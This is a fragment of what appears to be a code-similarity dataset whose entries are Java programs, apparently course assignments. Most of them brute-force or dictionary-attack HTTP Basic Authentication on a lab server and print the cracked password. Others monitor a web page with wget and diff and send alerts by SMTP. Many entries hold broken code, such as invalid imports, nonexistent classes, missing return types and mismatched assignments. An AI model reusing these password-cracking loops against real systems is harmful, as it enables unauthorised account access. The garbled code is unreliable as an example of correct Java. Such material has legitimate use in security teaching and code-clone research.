\ exit;\n\t\t\t \t }\n \t\t\t inp[2] = \"\";\n\t\t \t }\n\t \t }\n }\n\
\ }\n\n public void doit(String args[]) {\n \n try {\n BufferedReader\
\ in = new BufferedReader(\n new InputStreamReader\n (connectURL(new\
\ URL(args[0]), args[1], args[2])));\n String line;\n while ((line\
\ = in.readLine()) != null) {\n System.out.println(line);\n \
\ status = true;\n }\n }\n catch (IOException e) {\n \n\
\ }\n }\n\n public InputStream connectURL (URL url, String uname,\
\ String pword)\n throws IOException {\n conn = url.openConnection();\n\
\ conn.setRequestProperty (\"Authorization\",\n userNamePasswordBase64(uname,pword));\n\
\ conn.connect ();\n return conn.getInputStream();\n }\n\n public\
\ String userNamePasswordBase64(String username, String password) {\n return\
\ \" \" + base64Encode (username + \":\" + password);\n }\n\n private final\
\ static char pwdArray [] = {\n\t 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h',\n\
\t 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p',\n\t 'q', 'r', 's', 't',\
\ 'u', 'v', 'w', 'x',\n\t 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F',\n\t \
\ 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N',\n\t 'O', 'P', 'Q', 'R',\
\ 'S', 'T', 'U', 'V',\n\t 'W', 'X', 'Y', 'Z', ' '\n };\n\n private final\
\ static char base64Array [] = {\n 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H',\n\
\ 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P',\n 'Q', 'R', 'S', 'T', 'U',\
\ 'V', 'W', 'X',\n 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f',\n 'g',\
\ 'h', 'i', 'j', 'k', 'l', 'm', 'n',\n 'o', 'p', 'q', 'r', 's', 't', 'u',\
\ 'v',\n 'w', 'x', 'y', 'z', '0', '1', '2', '3',\n '4', '5', '6',\
\ '7', '8', '9', '+', '/'\n };\n\n private static String base64Encode (String\
\ string) {\n String encodedString = \"\";\n byte bytes [] = string.getBytes\
\ ();\n int i = 0;\n int pad = 0;\n while (i < bytes.length) {\n \
\ byte b1 = bytes [i++];\n byte b2;\n byte b3;\n if (i\
\ >= bytes.length) {\n b2 = 0;\n b3 = 0;\n pad = 2;\n\
\ }\n else {\n b2 = bytes [i++];\n if (i >= bytes.length)\
\ {\n b3 = 0;\n pad = 1;\n }\n else\n\
\ b3 = bytes [i++];\n }\n byte c1 = (byte)(b1 >> 2);\n\
\ byte c2 = (byte)(((b1 & 0x3) << 4) | (b2 >> 4));\n byte c3 = (byte)(((b2\
\ & 0xf) << 2) | (b3 >> 6));\n byte c4 = (byte)(b3 & 0x3f);\n encodedString\
\ += base64Array [c1];\n encodedString += base64Array [c2];\n switch\
\ (pad) {\n case 0:\n encodedString += base64Array [c3];\n \
\ encodedString += base64Array [c4];\n break;\n case 1:\n\
\ encodedString += base64Array [c3];\n encodedString += \"=\"\
;\n break;\n case 2:\n encodedString += \"==\";\n \
\ break;\n }\n }\n return encodedString;\n }\n }\n\n"
- "\nimport java.io.*;\n\npublic class PasswordFile {\n \n private String\
\ strFilepath;\n private String strCurrWord;\n private File fWordFile;\n\
\ private BufferedReader in;\n \n \n public PasswordFile(String filepath)\
\ {\n strFilepath = filepath;\n try {\n fWordFile = new\
\ File(strFilepath);\n in = new BufferedReader(new FileReader(fWordFile));\n\
\ }\n catch(Exception e)\n {\n System.out.println(\"\
Could not open file \" + strFilepath);\n }\n }\n \n String getPassword()\
\ {\n return strCurrWord;\n }\n \n String getNextPassword() {\n\
\ try {\n strCurrWord = in.readLine();\n \n \
\ \n \n }\n catch (Exception e)\n {\n \
\ \n return null;\n }\n \n return\
\ strCurrWord;\n }\n \n}\n"
- "\n\nimport java.net.*;\nimport java.io.*;\n\npublic class SendEMail {\n\n public\
\ void SendEMail(){}\n\npublic void sendMail(String recipient,String c, String\
\ subject){\n try {\n\n Socket s = new Socket(\"yallara.cs.rmit.edu.\"\
, 25);\n BufferedReader in = new BufferedReader\n (new InputStreamReader(s.getInputStream(),\
\ \"8859_1\"));\n BufferedWriter out = new BufferedWriter\n (new\
\ OutputStreamWriter(s.getOutputStream(), \"8859_1\"));\n\n send(in, out,\
\ \"HELO theWorld\");\n \n \n send(in, out, \"MAIL FROM: <watch@dog.>\"\
);\n send(in, out, \"RCPT : \"+recipient);\n send(in, out, \"DATA\"\
);\n send(out, \"Subject: \"+ subject);\n send(out, \"From: WatchDog.java\"\
);\n send (out, \"\\n\");\n \n BufferedReader reader;\n String\
\ line;\n reader = new BufferedReader(new InputStreamReader(new FileInputStream()));\n\
\ line = reader.readLine();\n while (line != null){\n send(out,\
\ line);\n line = reader.readLine();\n }\n send(out, \"\\n.\\\
n\");\n send(in, out, \"QUIT\");\n s.print();\n }\n catch (Exception\
\ e) {\n e.printStackTrace();\n }\n }\n\n public void send(BufferedReader\
\ in, BufferedWriter out, String s) {\n try {\n out.write(s + \"\\n\");\n\
\ out.flush();\n System.out.println(s);\n s = in.readLine();\n\
\ System.out.println(s);\n }\n catch (Exception e) {\n e.printStackTrace();\n\
\ }\n }\n\n public void send(BufferedWriter out, String s) {\n try {\n\
\ out.write(s + \"\\n\");\n out.flush();\n System.out.println(s);\n\
\ }\n catch (Exception e) {\n e.printStackTrace();\n }\n }\n\
}"
- source_sentence: "\n\nimport java.awt.*;\nimport java.String;\nimport java.util.*;\n\
import java.io.*;\nimport java.net.*;\n\n\n\npublic class BruteForce\n{\n private\
\ URL url;\n private HttpURLConnection connection ;\n private int stopTime\
\ = 0;\n private int startTime = 0;\n private int count = 0;\n\n public\
\ BruteForce()\n {\n System.out.println(\"Process is running...\");\n \
\ startTime = System.currentTimeMillis();\n threeLetters();\n twoLetters();\n\
\ }\n\n public static void main (String args[])\n {\n BruteForce bf\
\ = new BruteForce();\n }\n \n public void threeLetters()\n {\n String\
\ s1;\n char [] a = {'a','a','a'};\n\n for (int i0 = 0; i0 < 26; i0++)\n\
\ {\n for (int i1 = 0; i1 < 26; i1++)\n {\n for\
\ (int i2 = 0; i2 < 26; i2++)\n {\n s1 = String.valueOf((char)(a[0]\
\ + i0)) + String.valueOf((char)(a[1] + i1)) +\n\t\t String.valueOf((char)(a[2]\
\ + i2));\n decision(s1);\n count++;\n\n \
\ s1 = String.valueOf((char)(a[0] + i0)) + String.valueOf((char)(a[1] + i1))\
\ +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n\
\ decision(s1);\n count++;\n\n s1 =\
\ String.valueOf((char)(a[0] + i0)) + (String.valueOf((char)(a[1] + i1))).toUpperCase()\
\ +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n\
\ decision(s1);\n count++;\n\n s1 =\
\ (String.valueOf((char)(a[0] + i0))).toUpperCase() +\n (String.valueOf((char)(a[1]\
\ + i1))).toUpperCase() +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n\
\ decision(s1);\n count++;\n\n s1 =\
\ (String.valueOf((char)(a[0] + i0))) + (String.valueOf((char)(a[1] + i1))).toUpperCase()\
\ +\n String.valueOf((char)(a[2] + i2));\n decision(s1);\n\
\ count++;\n\n s1 = (String.valueOf((char)(a[0] +\
\ i0))).toUpperCase() + String.valueOf((char)(a[1] + i1)) +\n\t\t String.valueOf((char)(a[2]\
\ + i2));\n decision(s1);\n count++;\n\n \
\ s1 = (String.valueOf((char)(a[0] + i0))).toUpperCase() + String.valueOf((char)(a[1]\
\ + i1)) +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n\
\ decision(s1);\n count++;\n\n s1 =\
\ (String.valueOf((char)(a[0] + i0))).toUpperCase() +\n (String.valueOf((char)(a[1]\
\ + i1))).toUpperCase() + String.valueOf((char)(a[2] + i2));\n decision(s1);\n\
\ count++;\n }\n }\n }\n }\n \n public\
\ void twoLetters()\n {\n String s1;\n char [] a = {'a','a'};\n\n\
\ for (int i0 = 0; i0 < 26; i0++)\n {\n for (int i1 = 0; i1\
\ < 26; i1++)\n {\n s1 = String.valueOf((char)(a[0] + i0))\
\ + String.valueOf((char)(a[1] + i1));\n decision(s1);\n \
\ count++;\n\n s1 = String.valueOf((char)(a[0] + i0)) + String.valueOf((char)(a[1]\
\ + i1)).toUpperCase();\n decision(s1);\n count++;\n\n \
\ s1 = (String.valueOf((char)(a[0] + i0))).toUpperCase() +\n \
\ (String.valueOf((char)(a[1] + i1))).toUpperCase();\n decision(s1);\n\
\ count++;\n\n s1 = (String.valueOf((char)(a[0] + i0))).toUpperCase()\
\ + String.valueOf((char)(a[1] + i1));\n decision(s1);\n \
\ count++;\n }\n }\n }\n\n \n public void decision(String\
\ s1)\n {\n if (find(s1) == 200)\n {\n stopTime = System.currentTimeMillis();\n\
\ runTime = stopTime - startTime;\n System.out.println(\"***************************************\"\
);\n System.out.println(\"\\nAttack successfully\");\n System.out.println(\"\
\\nPassword is: \" + s1);\n System.out.println(\"\\nThe contents of the\
\ Web site: \");\n displayContent(s1);\n System.out.println(\"\
\\nTime taken crack: \" + runTime + \" millisecond\");\n System.out.println(\"\
\\nNumber of attempts: \" + count);\n System.out.println();\n\n \
\ System.exit(0);\n }\n }\n \n \n public int find(String s1)\n\
\ {\n int responseCode = 0;\n try\n {\n url = new URL(\"\
http://sec-crack.cs.rmit.edu./SEC/2/\");\n connection = (HttpURLConnection)url.openConnection();\n\
\n connection.setRequestProperty(\"Authorization\",\" \" + MyBase64.encode(\"\
\" + \":\" + s1));\n\n responseCode = connection.getResponseCode();\n\n\
\ }catch (Exception e)\n {\n System.out.println(e.getMessage());\n\
\ }\n return responseCode;\n }\n\n \n public void displayContent(String\
\ pw)\n {\n BufferedReader bw = null ;\n try\n {\n url\
\ = new URL(\"http://sec-crack.cs.rmit.edu./SEC/2/\");\n connection =\
\ (HttpURLConnection)url.openConnection();\n\n connection.setRequestProperty(\"\
Authorization\",\" \" + MyBase64.encode(\"\" + \":\" + pw));\n InputStream\
\ stream = (InputStream)(connection.getContent());\n if (stream != null)\n\
\ {\n InputStreamReader reader = new InputStreamReader (stream);\n\
\ bw = new BufferedReader (reader);\n String line;\n\n\
\ while ((line = bw.readLine()) != null)\n {\n \
\ System.out.println(line);\n }\n }\n }\n \
\ catch (IOException e)\n {\n System.out.println(e.getMessage());\n\
\ }\n }\n}\n\n\n\n\n"
sentences:
- "import java.io.*;\nimport java.net.*;\nimport java.text.*;\nimport java.util.*;\n\
\nclass BruteForce {\n\n String password=\"\";\n\n int num =401;\n\n\n \
\ public static void main (String[] args) {\n\n String str=\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\
;\n\n BruteForce URLcon;\n\n int length = 0;\n\n String passwd=\"\
\";\n\n int t0,t1;\n\n \n if (args.length == 0) {\n \t\n\
\ \tSystem.err.println (\n \t\t\n \t\t\"Usage : java BruteForce\
\ <username>\");\n \treturn;\n \t\n \t}\n String username\
\ = args[0];\n \n\n t0=System.currentTimeMillis();\n\n System.out.println\
\ (\" \" + new Date());\n \n System.out.println (\"Using BruteForce\
\ method attack \"+username+\"'s password.Please waiting.......\");\n\n \
\ for (int i=0;i<str.length();i++){\n\n passwd=str.substring(i,i+1);\n\
\n URLcon = new BruteForce (passwd,username);\n\n if ((URLcon.num)!=401)\
\ {\n\n \tt1=System.currentTimeMillis();\n\n System.out.println(\"\
The password: \"+ passwd);\n\n \tdouble dt =t1-t0;\n\n\n\n \
\ \tSystem.out.println(\"It took \"+ DecimalFormat.getInstance().format(dt/1000)+\
\ \" seconds.\");\n\n System.out.println (\"Finish \" + new Date());\n\
\ \n \treturn;\n\n }\n\n for\
\ (int j=0;j<str.length();j++){\n\n passwd =str.substring(i,i+1)+str.substring(j,j+1);\n\
\n URLcon = new BruteForce (passwd,username);\n\n \
\ if ((URLcon.num)!=401) {\n\n \t t1=System.currentTimeMillis();\n\
\n System.out.println(\"The password: \"+ passwd);\n\n\n \
\ double dt =t1-t0;\n\n\n\n System.out.println(\"\
It took \"+ DecimalFormat.getInstance().format(dt/1000)+ \" seconds.\");\n \
\ System.out.println (\"Finish \" + new Date());\n \
\ \t return;\n\n }\n for (int m=0;m<str.length();m++){\n\
\n passwd = str.substring(i,i+1)+str.substring(j,j+1)+str.substring(m,m+1);\n\
\n URLcon = new BruteForce (passwd,username);\n\n \
\ if ((URLcon.num)!=401) {\n\n \tt1=System.currentTimeMillis();\n\
\n System.out.println(\"The password: \"+ passwd);\n\n\n \
\ \t double dt =t1-t0;\n\n\n\n \tSystem.out.println(\"\
It took \"+DecimalFormat.getInstance().format(dt/1000)+ \" seconds.\");\n \
\ \n System.out.println (\"Finish \" + new\
\ Date());\n \n \t return;\n\n \
\ }\n\n\n }\n\n}\n}\n System.out.println(\" not find the\
\ password\");\n\n}\n\n public BruteForce (String password, String username){\n\
\n \t String urlString = \"http://sec-crack.cs.rmit.edu./SEC/2/\" ;\n\n \
\ \n\n try {\n\n String userPassword = username+\":\"+password ;\n\
\n String encoding = new userPassword.misc.BASE64Encoder().encode (userPassword.getBytes());\n\
\n URL url = new URL (urlString);\n\n HttpURLConnection uc = (HttpURLConnection)\
\ url.openConnection();\n\n uc.setRequestProperty (\"Authorization\", \"\
\ \" + encoding);\n\n url = uc.getResponseCode();\n\n\n }\n \
\ catch(MalformedURLException e){\n \t System.out.println(e);\n \
\ }catch(IOException e){\n System.out.println(e);\n }\n\n\n \
\ }\n}"
- "\n\n\n\npublic class HoldSharedData\n{\n private int numOfConnections\
\ = 0;\n private int startTime;\n private int totalTime = 0;\n \
\ private String[] password;\n private int pwdCount;\n\n public HoldSharedData(\
\ int time, String[] pwd, int count )\n {\n startTime = time;\n\n \
\ password = pwd;\n pwdCount = count;\n }\n\n public int getPwdCount()\n\
\ {\n return pwdCount;\n }\n\n public void setNumOfConnections(\
\ )\n {\n numOfConnections ++;\n }\n\n public int getNumOfConnections()\n\
\ {\n return numOfConnections;\n }\n\n public int getStartTime()\n\
\ {\n return startTime;\n }\n\n public void setTotalTime( int\
\ newTotalTime )\n {\n totalTime = newTotalTime;\n }\n\n public\
\ int getTotalTime()\n {\n return totalTime;\n }\n\n public String\
\ getPasswordAt( int index )\n {\n return password[index];\n }\n\
} \n"
- "\n\nimport java.awt.*;\nimport java.String;\nimport java.util.*;\nimport java.io.*;\n\
import java.net.*;\n\n\n\npublic class Dictionary\n{\n private URL url;\n \
\ private HttpURLConnection connection ;\n private int stopTime = 0;\n private\
\ int startTime = 0;\n private int count = 0;\n\n public Dictionary()\n \
\ {\n System.out.println(\"Process is running...\");\n startTime = System.currentTimeMillis();\n\
\ findWords();\n }\n\n public static void main(String args[])\n {\n\
\ Dictionary sc = new Dictionary();\n }\n \n \n public void findWords()\n\
\ {\n try\n {\n BufferedReader input = new BufferedReader(new\
\ FileReader (\"words\"));\n String text;\n while ((text = input.readLine())\
\ != null)\n {\n if ((text.length() == 3) || (text.length()\
\ == 2))\n {\n count++;\n decision(text);\n\
\ }\n\n }\n\n }\n catch (IOException io)\n \
\ {\n System.out.println(\"File Error: \" + io.getMessage());\n }\n\
\ }\n \n \n public void decision(String s1)\n {\n if (find(s1)\
\ == 200)\n {\n stopTime = System.currentTimeMillis();\n \
\ runTime = stopTime - startTime;\n System.out.println(\"***************************************\"\
);\n System.out.println(\"\\nAttack successfully\");\n System.out.println(\"\
\\nPassword is: \" + s1);\n System.out.println(\"\\nThe contents of the\
\ Web site: \");\n displayContent(s1);\n System.out.println(\"\
\\nTime taken crack: \" + runTime + \" millisecond\");\n System.out.println(\"\
\\nNumber of attempts: \" + count);\n System.out.println();\n\n \
\ System.exit(0);\n }\n }\n \n \n public int find(String s1)\n\
\ {\n int responseCode = 0;\n try\n {\n url = new URL(\"\
http://sec-crack.cs.rmit.edu./SEC/2/\");\n connection = (HttpURLConnection)url.openConnection();\n\
\n connection.setRequestProperty(\"Authorization\",\" \" + MyBase64.encode(\"\
\" + \":\" + s1));\n\n responseCode = connection.getResponseCode();\n\n\
\ }catch (Exception e)\n {\n System.out.println(e.getMessage());\n\
\ }\n return responseCode;\n }\n \n public void displayContent(String\
\ pw)\n {\n BufferedReader bw = null ;\n try\n {\n url\
\ = new URL(\"http://sec-crack.cs.rmit.edu./SEC/2/\");\n connection =\
\ (HttpURLConnection)url.openConnection();\n\n connection.setRequestProperty(\"\
Authorization\",\" \" + MyBase64.encode(\"\" + \":\" + pw));\n InputStream\
\ stream = (InputStream)(connection.getContent());\n if (stream != null)\n\
\ {\n InputStreamReader reader = new InputStreamReader (stream);\n\
\ bw = new BufferedReader (reader);\n String line;\n\n\
\ while ((line = bw.readLine()) != null)\n {\n \
\ System.out.println(line);\n }\n }\n }\n \
\ catch (IOException e)\n {\n System.out.println(e.getMessage());\n\
\ }\n }\n}\n\n\n\n\n"
- source_sentence: "\nimport java.net.*;\nimport java.io.*;\nimport java.Ostermiller.util.*;\n\
import java.util.*;\n\npublic class MyClient1 implements Runnable\n{\n private\
\ String hostname;\n private int port;\n private String filename;\n private\
\ Socket s;\n private int n;\n private InputStream sin;\n private OutputStream\
\ sout;\n private int dif;\n private String myPassword;\n private int status;\n\
\ private int myTime;\n private Dictionary myMaster;\n \n\n public MyClient1(Dictionary\
\ dic, int num, int myPort, String password)\n {\n \n hostname = new\
\ String(\"sec-crack.cs.rmit.edu.\");\n port = myPort;\n status = 0;\n\
\ myTime = 0;\n myPassword = password;\n filename = new String(\"\
/SEC/2/\");\n myMaster = 0;\n n = num;\n dif = 0;\n \n }\n\
\ public getDif()\n {\n return dif;\n }\n public int getStatus()\n\
\ {\n return status;\n }\n public void run() \n {\n String inputLine;\n\
\ String[] tokens = new String[5];\n int i;\n myTime = 0;\n \
\ finish = 0;\n start = System.currentTimeMillis();\n try\n \
\ {\n s = new Socket( hostname, port);\n }catch( UnknownHostException\
\ e)\n {\n System.out.println(\"'t find host\");\n }catch( IOException\
\ e)\n {\n System.out.println(\"Error connecting host \"+n);\n\
\t return;\n }\n while(s.isConnected() == false)\n continue;\n\
\ \n finish = System.currentTimeMillis();\n dif = finish - start;\n\
\ \n try\n {\n sin = s.getInputStream();\n }catch(\
\ IOException e)\n {\n System.out.println(\"'t open stream\");\n\
\ }\n BufferedReader fromServer = new BufferedReader(new InputStreamReader(\
\ ));\n try\n {\n sout = s.getOutputStream();\n }catch(\
\ IOException e)\n {\n System.out.println(\"'t open stream\");\n\
\ }\n \n PrintWriter toServer = new PrintWriter( new OutputStreamWriter(\
\ sout));\n toServer.print(\"GET \"+filename+\" HTTP/1.0\\r\\n\"+\"Authorization:\
\ \"+Base64.encode(\"\"+\":\"+myPassword)+\"\\r\\n\\r\\n\");\n toServer.flush();\n\
\ \n try\n {\n inputLine = fromServer.readLine();\n \
\ }catch( IOException e)\n {\n System.out.println(\"'t open stream\"\
);\n\t inputLine = null;\n }\n \n java.util.StringTokenizer \
\ = new java.util.StringTokenizer( inputLine, \" \");\n i = 0;\n while(bf.hasMoreTokens())\n\
\ {\n tokens[i] =bf .nextToken();\n\t i++;\n }\n status\
\ = Integer.parseInt( tokens[1]);\n myTime = System.currentTimeMillis();\n\
\ if( status == 200)\n {\n System.out.println(\"Ok \"+myPassword);\n\
\t myMaster.retire( this);\n }\n \n toServer.send();\n try\n\
\ {\n fromServer.recieve();\n }catch( IOException e)\n \
\ {\n System.out.println(\"'t open stream\");\n }\n try\n\
\ {\n s.connect();\n }catch( IOException e)\n {\n \
\ System.out.println(\"'t connection\");\n\t System.exit(0);\n }\n\
\ }\n public getTime()\n {\n return myTime;\n }\n \n}\n"
sentences:
- "import java.net.*;\nimport java.io.*;\nimport java.*;\nimport java.Runtime.*;\n\
import java.Object.*;\nimport java.util.*;\nimport java.util.StringTokenizer;\n\
\n\npublic class ReadFile\n{\n private StringTokenizer tokenizer;\n private\
\ BufferedReader bf;\n private String line;\n private String first;\n Vector\
\ in = new Vector();\n \n public void loadFile()throws NoSuchElementException,\
\ IOException\n {\n System.out.println(\"in loadFile\");\n try{\n bf\
\ = new BufferedReader(new FileReader(\"words\"));\n }\n catch(FileNotFoundException\
\ fe){}\n catch(IOException io){}\n while((line = bf.readLine())!=null)\n\
\ {\n\n int index = 0;\n tokenizer = new StringTokenizer(line);\n\
\ try\n\t {\n\t first = tokenizer.nextToken();\n\t \n\t \n\
\t if (first.length() == 3)\n\t {\n\t\tin.add(first);\n\t }\n\t }\n\
\ catch(NoSuchElementException n)\n\t {\n System.out.println(\"\
File Loaded Succesfully\");\n\n }\n\n }\n }\n public Vector getVector()\n\
\ {\n return in;\n }\n public static void main (String args[])\n {\n\
\ Vector v = new Vector();\n try\n {\n System.out.println(\"\
in \");\n\t ReadFile rf = new ReadFile();\n rf.loadFile();\n v =\
\ rf.getVector();\n\t \n }\n catch(IOException e)\n {\n System.out.println(e);\n\
\ }\n System.out.println(\"size:\" + v.size());\n for (int i = 0;\
\ i< v.size(); i++)\n {\n System.out.println(i+1+ \":\" + v.elementAt(i));\n\
\ }\n \n \n }\n \n}\n"
- "\nimport java.net.*;\nimport java.io.*;\nimport java.Ostermiller.util.*;\nimport\
\ java.util.*;\n\npublic class MyClient2 implements Runnable\n{\n private String\
\ hostname;\n private int port;\n private String filename;\n private Socket\
\ s;\n private int n;\n private InputStream sin;\n private OutputStream\
\ sout;\n private int dif;\n private String myPassword;\n private int status;\n\
\ private int myTime;\n private BruteForce myMaster;\n \n\n public MyClient2(BruteForce\
\ bf , int num, int myPort, String password)\n {\n \n hostname = new\
\ String(\"sec-crack.cs.rmit.edu.\");\n port = myPort;\n status = 0;\n\
\ myTime = 0;\n myPassword = password;\n filename = new String(\"\
/SEC/2/\");\n myMaster = 0;\n n = num;\n dif = 0;\n \n }\n\
\ public getDif()\n {\n return dif;\n }\n public int getStatus()\n\
\ {\n return status;\n }\n public void run() \n {\n String inputLine;\n\
\ String[] tokens = new String[5];\n int i;\n myTime = 0;\n \
\ finish = 0;\n start = System.currentTimeMillis();\n try\n \
\ {\n s = new Socket( hostname, port);\n }catch( UnknownHostException\
\ e)\n {\n System.out.println(\"'t find host\");\n }catch( IOException\
\ e)\n {\n System.out.println(\"Error connecting host \"+n);\n\
\t return;\n }\n while(s.isConnected() == false)\n continue;\n\
\ \n finish = System.currentTimeMillis();\n dif = finish - start;\n\
\ \n try\n {\n sin = s.getInputStream();\n }catch(\
\ IOException e)\n {\n System.out.println(\"'t open stream\");\n\
\ }\n BufferedReader fromServer = new BufferedReader(new InputStreamReader(\
\ ));\n try\n {\n sout = s.getOutputStream();\n }catch(\
\ IOException e)\n {\n System.out.println(\"'t open stream\");\n\
\ }\n \n PrintWriter toServer = new PrintWriter( new OutputStreamWriter(\
\ sout));\n toServer.print(\"GET \"+filename+\" HTTP/1.0\\r\\n\"+\"Authorization:\
\ \"+Base64.encode(\"\"+\":\"+myPassword)+\"\\r\\n\\r\\n\");\n toServer.flush();\n\
\ \n try\n {\n inputLine = fromServer.readLine();\n \
\ }catch( IOException e)\n {\n System.out.println(\"'t open stream\"\
);\n\t inputLine = null;\n }\n \n java.util.StringTokenizer \
\ = new java.util.StringTokenizer( inputLine, \" \");\n i = 0;\n while(sin.hasMoreTokens())\n\
\ {\n tokens[i] = sin.nextToken();\n\t i++;\n }\n status\
\ = Integer.parseInt( tokens[1]);\n myTime = System.currentTimeMillis();\n\
\ if( status == 200)\n {\n System.out.println(\"Ok \"+myPassword);\n\
\t myMaster.retire( this);\n }\n \n toServer.send();\n try\n\
\ {\n fromServer.receive();\n }catch( IOException e)\n \
\ {\n System.out.println(\"'t open stream\");\n }\n try\n\
\ {\n s.connect();\n }catch( IOException e)\n {\n \
\ System.out.println(\"'t connection\");\n\t System.exit(0);\n }\n\
\ }\n public getTime()\n {\n return myTime;\n }\n \n}\n"
- "\n\nimport java.util.*;\nimport java.text.*;\nimport java.io.*;\nimport java.*;\n\
import java.net.*;\n\npublic class WatchDog\n{\n public static void main(String\
\ args[])\n {\n String s = null;\n String webpage = \"http://www.cs.rmit.edu./students/\"\
;\n \n \n String file1 = \"file1\";\n String file2 = \"file2\"\
;\n \n try\n {\n Process p = Runtime.getRuntime().exec(\"\
wget -O \" + file1 + \" \" + webpage);\n \n BufferedReader stdInput\
\ = new BufferedReader(new \n InputStreamReader(p.getInputStream()));\n\
\n BufferedReader stdError = new BufferedReader(new \n \
\ InputStreamReader(p.getErrorStream()));\n\n \n while ((s\
\ = stdInput.readLine()) != null) { \n System.out.println(s);\n \
\ }\n \n \n while ((s = stdError.readLine())\
\ != null) { \n System.out.println(s);\n }\n \n \
\ try\n {\n p.waitFor(); \n }\n catch\
\ (InterruptedException g) \n {\n } \n }\n catch (IOException\
\ e) {\n System.out.println(\"exception happened - here's what I know:\
\ \");\n e.printStackTrace();\n System.exit(-1);\n }\n \
\ \n while (true) \n {\n try\n {\n Process\
\ p = Runtime.getRuntime().exec(\"sleep 86400\"); \n \n \
\ BufferedReader stdInput = new BufferedReader(new \n InputStreamReader(p.getInputStream()));\n\
\n BufferedReader stdError = new BufferedReader(new \n \
\ InputStreamReader(p.getErrorStream()));\n\n \n while\
\ ((s = stdInput.readLine()) != null) { \n System.out.println(s);\n\
\ }\n \n \n while ((s = stdError.readLine())\
\ != null) { \n System.out.println(s);\n }\n \
\ \n try\n {\n p.waitFor(); \n \
\ }\n catch (InterruptedException g) \n {\n \
\ } \n }\n catch (IOException e) \n {\n System.out.println(\"\
exception happened - here's what I know: \");\n e.printStackTrace();\n\
\ System.exit(-1);\n } \n try \n {\n \
\ Process p = Runtime.getRuntime().exec(\"wget -O \" + file2 + \" \" + webpage);\n\
\ \n BufferedReader stdInput = new BufferedReader(new \n\
\ InputStreamReader(p.getInputStream()));\n\n BufferedReader\
\ stdError = new BufferedReader(new \n InputStreamReader(p.getErrorStream()));\n\
\n \n while ((s = stdInput.readLine()) != null) { \n \
\ System.out.println(s);\n }\n \n \
\ \n while ((s = stdError.readLine()) != null) { \n System.out.println(s);\n\
\ }\n \n try\n {\n p.waitFor();\
\ \n }\n catch (InterruptedException g) \n {\n\
\ } \n \n }\n catch (IOException e) \n \
\ {\n System.out.println(\"exception happened - here's what I\
\ know: \");\n e.printStackTrace();\n System.exit(-1);\n\
\ }\n try \n {\n \n Process p =\
\ Runtime.getRuntime().exec(\"diff \" + file1 + \" \" + file2);\n \n\
\ BufferedReader stdInput = new BufferedReader(new \n \
\ InputStreamReader(p.getInputStream()));\n\n BufferedReader stdError\
\ = new BufferedReader(new \n InputStreamReader(p.getErrorStream()));\
\ \n \n \n while ((s = stdError.readLine())\
\ != null) { \n System.out.println(s);\n }\n \
\ \n try\n {\n p.waitFor(); \n \
\ }\n catch (InterruptedException g) \n {\n \
\ }\n \n if ((p.exitValue()) == 1) \n { \n \
\ \n String mailServerURL = \"yallara.cs.rmit.edu.\";\n\
\ String host = \"yallara.cs.rmit.edu.\";\n String\
\ from = \"@yallara.cs.rmit.edu.\";\n \n String subject\
\ = \"Change Detected In WatchDog.java\";\n \n try\n \
\ {\n \t\n Socket csoc=new Socket(mailServerURL,25);\n\
\ BufferedReader in=new BufferedReader(\n \
\ new InputStreamReader(csoc.getInputStream()));\n \n\
\ PrintWriter out=new PrintWriter(csoc.getOutputStream(),true);\n\
\ System.out.println(\"HELO \"+host);\n System.out.println(in.readLine());\n\
\ out.println(\"MAIL FROM:\"+from);\n System.out.println(in.readLine());\n\
\ System.out.println(in.readLine());\n System.out.println(\"\
DATA\");\n System.out.println(in.readLine());\n \
\ System.out.println(\"SUBJECT:\"+subject);\n System.out.println(in.readLine());\n\
\ \n \n while ((s = stdInput.readLine())\
\ != null){\n System.out.println(s);\n }\n\
\ out.println(\".\");\n System.out.println(in.readLine());\n\
\ System.out.println(\"QUIT\");\n System.out.println(in.readLine());\
\ \n }\n catch(Exception e)\n \
\ {\n e.printStackTrace();\n System.out.println(\"\
Some error occoured while communicating server\");\n }\n \
\ } \n }\n catch (IOException e) \n {\n \
\ System.out.println(\"exception happened - here's what I know: \");\n\
\ e.printStackTrace();\n System.exit(-1);\n }\n\
\ } \n }\n}"
- source_sentence: "\n\nimport java.io.*;\nimport java.*;\nimport java.net.*;\nimport\
\ java.util.*;\n\npublic class Dictionary {\n public static void main (String[]\
\ args) throws IOException {\n BufferedReader stdin = new BufferedReader (new\
\ InputStreamReader(System.in));\n\n d = new Date().getTime();\n \
\ FileReader fr = new FileReader(\"/usr/share/lib/dict/words\");\n BufferedReader\
\ bufr = new BufferedReader(fr);\n String word = bufr.readLine(); \
\ \n int total = 960;\n String[] pws = new String[total];\n\
\ int count = 0;\n while (word!=null){\n if (word.length()<=3)\
\ { pws[count] = word; count++;}\n\tword = bufr.readLine();\n }\n \
\ \n int i=0;\n int response = 0;\n for (i=0;i<count;i++){\n\
\ String uname = \"\";\n String userinfo = uname + \":\" + pws[i];\n\
\ try{\n String encoding = new bf.misc.BASE64Encoder().encode (userinfo.getBytes());\n\
\ URL url = new URL(\"http://sec-crack.cs.rmit.edu./SEC/2/\");\n \
\ HttpURLConnection uc = (HttpURLConnection)url.openConnection();\n \
\ uc.setRequestProperty (\"Authorization\", \" \" + encoding);\n response\
\ = uc.getResponseCode();\n\t if (response == 200) break;\n\t else uc.disconnect();\n\
\ }\n catch(IOException e){ System.err.println(e); e.printStackTrace();\
\ } \n catch(IllegalStateException s){ System.err.println(s); s.printStackTrace();\
\ }\n }\n System.out.println(\"Response \"+i+\" was \"+response);\n\
\ System.out.println(\"The successful password was \"+pws[i]);\n \
\ finish = new Date().getTime();\n float totaltime = (float)(finish-d)/1000;\n\
\ System.out.println(\"Time taken: \"+totaltime+ \" seconds.\");\n \
\ \n }\n}\n\n"
sentences:
- "\nimport java.net.*;\nimport java.io.*;\nimport java.util.*;\n\n\npublic class\
